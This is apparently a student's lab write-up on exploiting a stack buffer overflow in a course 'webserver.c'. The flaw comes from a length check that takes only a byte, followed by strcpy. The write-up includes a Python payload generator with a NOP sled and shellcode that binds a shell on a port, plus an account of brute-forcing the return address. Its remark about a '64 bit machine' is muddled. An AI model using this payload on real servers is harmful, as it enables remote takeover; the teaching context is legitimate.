Attack Explanation:
After reviewing the webserver.c code, we determined that the vulnerability lie in the "check_filename_length" method, since it took a byte as its parameter instead of an int. Due to this, the method only checked the least significant byte of the length of the provided text. Therefore, any text provided could be of a length greater than one byte,
specifically a text length that meets the condition L % 256 < 100 to meet the method's condition. In other words, if the last 8 bits were less than a 100, it passed the test. Due to the use
of strcpy instead of strncpy following the length check, we were then able to overflow the handle method buffer with an attack string of our choice. 

To do the attack locally, we first found the location of the return address using GDB and found that the return address was at 0xFFFFD5CC. We knew that we wanted to rewrite that address to point to a location a bit after it, closer to the top of the stack in the middle of the NOPS. So instead of filling our buffer with the NOPS and shell code, we wrote it after the return address, filling up the stack further. (therefore, we ran into a lot of seg faults at first cause my attack string was too long)

To write the attack string we created a python script. We first printed the desired return address about 36  times so that it over flows the buffer and then re-writes the return address. Then we had a 100 NOPS. Following that we put our shell code that we got from the recitation slides. 

Because we used 100 nops, we added 50 bytes to our original return address so that it lands about in the middle of the NOPS. 

this was the what our script looked like 

for x in range(36):
    #FFFFD5CC
    #added 50 0xFF FF D5 FE
    print("\\xFE\\xD5\\xFF\\xFF",end="") #address is 4 bytes 

#addings NOPS
for x in range(100): #1 byte each
    print ("\\x90", end="")

#shellcode
print("\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x13\\xd2", end="")

print("\\x43\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\\x44\\x24\\x04", end="")

print("\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1", end="")

print("\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3", end="")

print("\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80", end="")

#92 bytes 
print(" HTTP",end="")


Then once it worked remotely, all we had to do was find the correct return address to change it to because the machine we were running it on was a 64 bit machine. Since we couldn't use GDB on it we took the top of the stack 0xbfffffff for 64 bit machine and starting subtracting. We tried 300, 400, 500, 600, and 700. the 700 finally worked!



Assignment Review:
Overall this assignment was quite interesting. The change of pace brought by such a different assignment was really cool. I really enjoyed this assingment and thought it was a really cool. I now understand endianess, computer architecture, and vulnerabilities more. I do think some of it could have been explained more clearly. Just some basics such as commands on the terminal and what not, but over all thought it was a cool assignment. 
